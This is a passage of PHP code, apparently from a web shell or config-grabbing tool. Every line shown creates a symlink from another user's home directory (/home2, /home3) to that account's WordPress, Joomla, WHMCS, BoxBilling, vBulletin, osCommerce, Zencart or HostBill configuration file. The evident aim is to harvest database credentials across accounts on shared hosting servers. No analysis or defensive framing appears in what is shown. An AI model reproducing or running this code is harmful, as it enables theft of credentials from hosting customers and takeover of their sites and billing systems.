1656. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1657. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1658. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1659. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1660. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1661. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1662. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1663. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1664. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1665. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1666. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1667. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1668. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1669. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1670. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1671. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1672. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1673. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1674. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1675. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1676. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1677. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1678. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1679. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1680. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1681. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1682. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1683. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1684. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1685. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1686. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1687. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1688. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1689. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1690. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1691. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1692. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1693. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1694. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1695. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1696. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1697. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1698. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1699. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1700. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1701. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1702. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1703. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1704. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1705. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1706. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1707. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1708. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1709. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1710. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1711. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1712. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1713. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1714. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1715. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1716. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1717. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1718. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1719. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1720. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1721. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1722. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1723. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1724. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1725. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1726. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1727. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1728. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1729. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1730. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1731. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1732. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1733. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1734. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1735. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1736. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1737. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1738. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1739. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1740. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1741. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1742. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1743. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1744. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1745. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1746. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1747. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1748. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1749. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1750. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1751. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1752. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1753. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1754. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1755. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1756. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1757. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1758. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1759. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1760. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1761. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1762. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1763. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1764. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1765. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1766. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1767. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1768. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1769. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1770. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1771. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1772. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1773. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1774. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1775. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1776. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1777. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1778. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1779. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1780. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1781. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1782. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1783. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1784. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1785. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1786. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1787. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1788. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1789. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1790. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1791. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1792.  
1793. //Home3
1794.  
1795. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1796. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1797. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1798. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1799. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1800. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1801. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1802. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1803. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1804. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1805. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1806. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1807. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1808. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1809. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1810. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1811. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1812. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1813. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1814. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1815. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1816. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1817. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1818. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1819. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1820. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1821. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1822. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1823. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1824. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1825. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1826. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1827. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1828. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1829. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1830. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1831. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1832. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1833. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1834. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1835. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1836. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1837. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1838. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1839. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1840. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1841. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1842. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1843. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1844. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1845. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1846. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1847. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1848. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1849. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1850. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1851. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1852. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1853. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1854. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1855. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1856. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1857. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1858. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1859. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1860. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1861. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1862. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1863. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1864. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1865. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1866. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1867. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1868. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1869. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1870. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1871. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1872. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1873. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1874. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1875. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1876. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1877. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1878. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1879. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1880. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1881. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1882. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1883. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1884. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1885. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1886. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1887. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1888. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1889. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1890. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1891. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1892. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1893. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1894. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1895. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1896. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1897. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1898. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1899. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1900. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1901. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1902. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1903. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1904. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1905. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1906. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1907. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1908. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1909. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1910. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1911. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1912. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1913. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1914. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1915. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1916. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1917. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1918. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1919. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1920. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1921. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1922. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1923. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1924. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1925. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1926. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1927. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1928. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1929. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1930. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1931. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1932. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1933. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1934. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1935. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1936. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1937. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1938. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1939. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1940. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1941. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1942. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1943. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1944. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1945. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1946. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1947. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1948. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1949. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1950. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1951. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1952. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1953. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1954. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1955. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1956. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1957. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1958. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1959. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1960. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1961. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1962. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1963. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1964. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1965. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1966. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
